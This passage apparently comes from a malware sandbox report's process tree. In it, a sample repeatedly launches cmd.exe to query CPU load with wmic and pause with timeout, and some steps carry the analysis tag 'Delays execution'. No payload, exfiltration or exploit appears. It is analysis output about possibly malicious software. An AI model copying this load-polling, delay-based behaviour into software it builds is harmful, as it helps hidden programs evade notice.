    3⤵
    PID:956
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4940
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4568
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3740
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:740
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:628
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4828
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1320
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:292
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:504
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4320
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4912
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5008
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4128
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1976
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2668
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4692
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4000
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2440
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2872
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3984
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2420
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2400
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:876
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1668
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5012
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:360
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4240
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4524
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2864
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1808
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1608
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1292
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1064
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1084
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3040
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2696
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3504
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3476
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3912
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4988
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:688
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2240
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4312
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5092
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4556
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3996
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4084
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4140
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:768
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4644
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4260
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2356
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3936
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4180
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:296
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2856
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4196
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4368
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:852
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1828
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:640
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4852
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5028
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1356
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4108
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1216
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2628
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:904
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2040
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5104
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2512
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2372
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4820
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4168
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:300
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5052
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4940
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1176
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4748
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:380
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2648
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:628
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4120
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:832
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:932
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4320
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4076
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4912
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4128
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:224
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4152
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4012
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1852
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:336
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2480
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1516
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1736
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1060
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5036
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1000
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4188
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:996
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1276
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1544
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4468
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2916
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2964
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3428
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1432
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3064
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3044
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3540
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4176
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2532
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3520
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4984
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4956
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2816
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4308
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:900
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3996
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:908
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1036
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3828
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1076
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2868
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4944
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4432
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3656
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4436
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4936
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2328
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4484
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1164
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4440
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:640
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4292
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4960
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1356
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4080
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3356
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2628
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4400
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4404
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:664
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4252
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2372
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4064
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1676
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:300
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4116
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1772
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1176
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4600
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1012
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:740
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:292
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:796
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1200
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5008
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2404
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2832
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5020
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3888
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4608
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4152
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4028
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4992
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2872
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1240
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4884
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1736
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2416
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:884
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1000
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2788
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1280
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5040
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2748
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2260
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4832
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3028
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2780
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3040
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:468
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4552
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3972
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4976
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4624
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:688
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3764
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2100
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2688
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2796
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4308
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4084
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2520
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:908
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1592
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2868
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2808
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2352
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4348
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4432
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4196
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3800
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4144
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2960
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4408
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2700
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2396
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2516
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4880
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:588
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2436
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4048
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2844
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:904
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4404
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4820
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4916
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2372
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5052
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3276
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:300
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4928
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3324
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1176
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:628
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2648
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3320
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4148
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3508
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1200
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4352
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5004
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2832
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1512
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4584
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1672
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4012
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2944
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2420
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4300
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3684
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:876
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5036
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:884
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:980
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4188
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1280
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1276
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3284
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1808
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1292
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3428
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2780
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1756
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:64
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4552
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2096
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1288
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4624
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:408
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5072
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1952
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4264
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3744
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2840
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:632
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3924
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:768
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2712
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4244
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1076
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2868
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2176
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3656
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4348
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4484
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4936
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3824
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4036
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4440
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:852
